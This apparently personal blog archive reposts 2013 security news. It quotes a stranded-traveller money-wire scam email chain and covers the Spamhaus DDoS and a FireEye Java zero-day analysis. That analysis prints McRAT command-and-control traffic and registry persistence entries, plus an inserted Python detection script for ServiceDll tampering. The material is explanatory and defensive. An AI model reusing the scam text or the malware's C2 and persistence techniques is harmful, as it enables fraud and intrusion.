
Friday, August 2, 2013

The social networking method of hacking !!!!

Morning,

Just hoping this email reaches you well, I'm sorry for this emergency and for not informing you about my urgent trip to United Kingdom but I just have to let you know my present predicament. Everything was fine until I was attacked on my way back to the hotel, I wasn't hurt but I lost my money, bank cards, mobile phone and my bag in the course of this attack. I immediately contacted my bank in order to block my cards and also made a report at the nearest police station. I've been to the embassy and they are helping me with my documentation so I can fly out but I'm urgently in need of some money to pay for my hotel bills and my flight ticket home, will definitely REFUND as soon as back home.

Kindly let me know if you would be able to help me out so I can forward you the details required for a wire transfer.

Waiting to hear back from you...

With kind regards.

JGD.

Vilas

=====================
Sandeep Erat <sandeeperat@gmail.com>
Jul 26 (7 days ago)

to vilaspatki
Jgd!

What is this?

What u wanna me to do!
Regards,
Sandeep
vilas patki
Jul 26 (7 days ago)

to me
I'm so glad you replied back, I have nothing left on me right now, all I need you to do is to have it wired to my name through Western Union Money Transfer and I will pick it up here, you have my word and I can make it up to you, I promise to pay you back as soon as I get back home.

Here's my info below

Name: vilas patki
Location: 456B  Brecon Road, Abervagenny, Gwent,
              Wales, NP7  5UH
               United Kingdom.
Amount : 1,880 GPB

As soon as it has been done, kindly get back to me with the transfer details (MTCN #) given to you at the Western Union Money Transfer Outlet.


Waiting to hear back from you...


With kind regards.

JGD.

Vilas

=====================
Dear Vilas,
Jgd!

Thank you for the details! And so sorry for the situation!

But I do not have this much money!

Please let me know how to go about!
 
SO GUYS BE CAREFUL !!!!
The so called hacker can come in any form !!!!
Love 
Sandeep

Thursday, March 28, 2013

Hackers mount widespread cyber attack !!!



March 27, 2013 7:40 pm


Hackers have hit a European anti-spam group with a cyber attack so large that experts say it could slow down the internet itself.
The original target was Spamhaus, which said it had been subject to large-scale distributed denial of service (DDoS) attacks for the past week. Such attacks overwhelm servers by bombarding them with spurious requests simultaneously from computers all over the internet.
According to security companies monitoring the attack, it has risen in scale from 10 gigabits per second of data to 300Gbps, making it one of the largest of its kind and about six times the size of most such incidents.
Cloudflare, a security company hired by Spamhaus to fight off the bombardment, said the attack ceased on March 21 but resumed the next day with increased power, targeting Cloudflare’s network providers in an effort to neutralise the defence.
The company said the result was that the attack moved up the chain to the so-called Tier 1 providers, who service the internet with raw bandwidth. In effect, all internet users were sharing the increased load.
“While we don’t have direct visibility into the traffic loads they saw, we have been told by one major Tier 1 provider that they saw more than 300Gbps of attack traffic related to this attack. That would make this attack one of the largest ever reported,” Cloudflare said.
Spamhaus’ volunteers maintain a list of internet addresses known to be used for spam, enabling users of its service to filter out large amounts of junk or infected email. As a result it has many enemies, and has accused one such blocked site of colluding with online criminals in eastern Europe and Russia to launch the attack.
However, the attack has failed to bring the address-blocking service offline. “We’re up – they haven’t been able to knock us down. Our engineers are doing an immense job in keeping it up – this sort of attack would take down pretty much anything else,” Steve Linford, chief executive for Spamhaus, told the BBC in London.
Raj Samani, McAfee’s chief technology officer in Europe, said an attack of this scale was likely to affect all internet users, from consumers to small and large businesses. “We are seeing an increase in volume and sophistication of these types of attacks stemming from all parts of the world,” he said.
Kaspersky Lab, another security company, said that owing to the nature of the internet the attack would probably impede normal web services for users of other sites, not just Spamhaus. Users may experience a slow network or total unavailability of certain websites.
Although many users have experienced delays in bandwidth-hungry services such as Netflix, Thinkbroadband, a broadband consultancy in the UK, said its tests showed no evidence that internet speeds had been slower.
Copyright The Financial Times Limited 2013. 

Monday, March 4, 2013

YAJ0: Yet Another Java Zero-Day


Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed.
Unlike other popular Java vulnerabilities, in which the security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in the JVM process. After triggering the vulnerability, the exploit looks for the memory that holds JVM internal data structures, such as whether the security manager is enabled, and then overwrites that chunk of memory with zeros. Upon successful exploitation, it downloads a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99 as svchost.jpg) from the same server hosting the JAR file and then executes it.

Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised.
The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic:
POST /59788582 HTTP/1.0
Content-Length: 44
Accept: text/html,application/xhtml+xml,application/xml,*/*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 110.XXX.55.187
Pragma: no-cache

4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw.

McRAT persists by writing a copy of itself as a DLL to (C:\Documents and Settings\admin\AppMgmt.dll) and performing the following registry modifications:

\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll
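A defender-side check for the persistence change described above, as an added example that is not FireEye's code: it parses lines in the registry format shown and flags any ServiceDll value that differs from a known baseline or resolves outside System32. The C:\Windows root, the System32 heuristic (legitimate third-party services can live elsewhere) and the ExampleSvc entry are assumptions of this example.

```python
import ntpath
import re

# Line format copied from the registry lines in the post above.
LINE_RE = re.compile(
    r'^\\REGISTRY\\MACHINE\\SYSTEM\\(?P<cs>[^\\]+)\\Services\\(?P<svc>[^\\]+)'
    r'\\Parameters\\"ServiceDll"\s*=\s*(?P<dll>.+?)\s*$',
    re.IGNORECASE,
)

# Assumption: default Windows install root; adjust for the host under review.
SYSTEM_ROOT = r"C:\Windows"
TRUSTED_DIR = ntpath.join(SYSTEM_ROOT, "System32").lower() + "\\"

# Expected value for the one service named in the post.
BASELINE = {"appmgmt": r"%SystemRoot%\System32\appmgmts.dll"}


def normalize(path):
    """Expand %SystemRoot%, collapse '..' segments, and lowercase."""
    unquoted = path.strip().strip('"')
    expanded = re.sub(r"%systemroot%", lambda m: SYSTEM_ROOT, unquoted, flags=re.IGNORECASE)
    return ntpath.normpath(expanded).lower()


def review_service_dlls(lines):
    """Return (service, dll, reason) for each ServiceDll value worth review."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not a ServiceDll record
        svc, dll = m.group("svc"), m.group("dll")
        norm = normalize(dll)
        expected = BASELINE.get(svc.lower())
        if expected and norm != normalize(expected):
            findings.append((svc, dll, "differs from baseline"))
        elif not norm.startswith(TRUSTED_DIR):
            findings.append((svc, dll, "outside System32"))
    return findings


# Constructed sample: the two AppMgmt lines from the post plus one made-up service.
SAMPLE = [
    r'\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll',
    r'\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll',
    r'\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ExampleSvc\Parameters\"ServiceDll" = %SystemRoot%\System32\..\Temp\x.dll',
]
```

Calling `review_service_dlls(SAMPLE)` reports the redirected AppMgmt entry and the traversal path, and passes the stock appmgmts.dll value.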
This post was intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in their browsers until a patch has been released; alternatively, set your Java security settings to "High" and do not execute any unknown Java applets from outside your organization.
We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability.

This blog was written by FireEye researchers Darien Kindlund and Yichong Lin.
Update: Oracle assigned CVE-2013-1493 on this vulnerability.


Monday, February 18, 2013

Facebook employees hit with malware

Facebook Inc confirmed on Friday that laptops used by its employees had been compromised by malware when staff visited the infected website of a mobile software developer last month.


The incursion was detected when Facebook's network monitoring personnel unearthed a suspect domain and traced it to an employee's computer. The malware discovered on the machine made use of a known vulnerability within Oracle's Java runtime platform. The hole was resolved with a patch released by Oracle on 1 February.


Facebook stressed there was no evidence user data had been accessed, but Bloomberg reported yesterday that the social media company is working with the US Federal Bureau of Investigation (FBI) in an effort to determine the source of the attack.

"As soon as we discovered the presence of the malware, we remediated all infected machines, informed law enforcement, and began a significant investigation that continues to this day," Facebook said.


Earlier this month Twitter revealed it had been subject to an attack and said that as many as 250,000 accounts may have been accessed, including the personal data attached to them. Other attacks on the websites of prominent newspapers The New York Times, The Washington Post, and The Wall Street Journal were attributed to Chinese hackers.

Multi-million euro cybercrime gang leader arrested in UAE

Spanish police have arrested a gang of cyber criminals who were extorting as much as one million euros a year ($1.3m) using ransomware.

The leader of the gang, a 27-year-old Russian, was arrested while on holiday in Dubai in December. Ten other gang members (six Russians, two Ukrainians and two Georgians), who were apparently responsible for laundering proceeds of the scam, were arrested in Spain.

The gang used malware that was first seen in 2005, although it adapted the malware to target end users in 30 countries. The ransomware, known as Reveton, was tailored to look like a message from different police authorities, and would freeze the user's PC until they paid a fine of 100 euros for accessing file sharing, child pornography or terrorist sites.

The money was laundered through PaySafeCard/UKash vouchers, with the ransom paid in the US, transferred to the gang in Spain and laundered, and the proceeds wired to Russia.

Trend Micro's eCrimes unit was heavily involved in the investigation, which the company warns is ongoing; it also warns that the Reveton malware is still in the wild.

Thursday, January 31, 2013

Hacker floods Dubai 999 service !!!

Dubai Police today warned the public against clicking on an infected Web link, which was triggering 999 calls and jamming the emergency line, 7Days reported.


The announcement, made through Twitter, appealed to online visitors not to click the link that was claiming to lead to a close-up picture of the sun, and condemned the irresponsible act as having endangered lives. It is not clear from the warning how the infected link was propagated.


"We have received numerous calls because of this link," Brigadier Omar Al Shamsi, director of Dubai Police command and control, told Arabic daily Al Bayan.

"They are really very disturbing and annoying as they put great pressure on the emergency operator. It is not the first time such irresponsible actions [have been] taken by irresponsible persons. Previously, we have succeeded in identifying those persons and presented them to court on charges of disturbing authorities."


Al Shamsi was referring to the October 2012 case of an Emirati man who sent a link through the Blackberry network that he claimed was UAE vocalist Shamma Hamdan's phone number. The number was linked to the emergency 999 service and inundated the line with calls from Shamma fans before police publicised the problem, again through Twitter.

Source: http://www.itp.net/592050-hacker-floods-dubai-999-service?tab=article#.UQphRPJBCQA

Friday, January 4, 2013

Nationwide Insurance data breach affects 1.1 million people

NBC News 

Nationwide has notified customers and those who contacted the insurance company for information about the security breach.
Nationwide Mutual Insurance Company fell victim to hackers in October, affecting an estimated 1.1 million individuals, including non-customers who had sought insurance quotations, the company told customers Thursday.
Nationwide's subsidiary Allied Insurance was also affected.
Thieves made off with names and corresponding Social Security numbers, driver's license numbers and birth dates after they broke into the company network.

Nationwide reported the incident to authorities immediately, but did not inform consumers until now.
"We are not aware of any misuse of consumers' information at this time," the company said in a statement.
A patchwork of news reports alluded to the scope of the breach, with a combined 120,000 individuals known to be affected across Iowa, Florida and Ohio, Kaspersky's Threatpost blog reported. It wasn't until this week that the full extent of the breach became known.
Nationwide is in the process of informing its affected customers, but nonclients who sought quotes should be extra vigilant in monitoring their accounts' activity.
Nationwide said it would supply victims with one year of credit monitoring services and up to $1 million for identity theft protection. It also posted a FAQ page to answer customers' questions.
Copyright 2012 TechNewsDaily, a TechMediaNetwork company. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.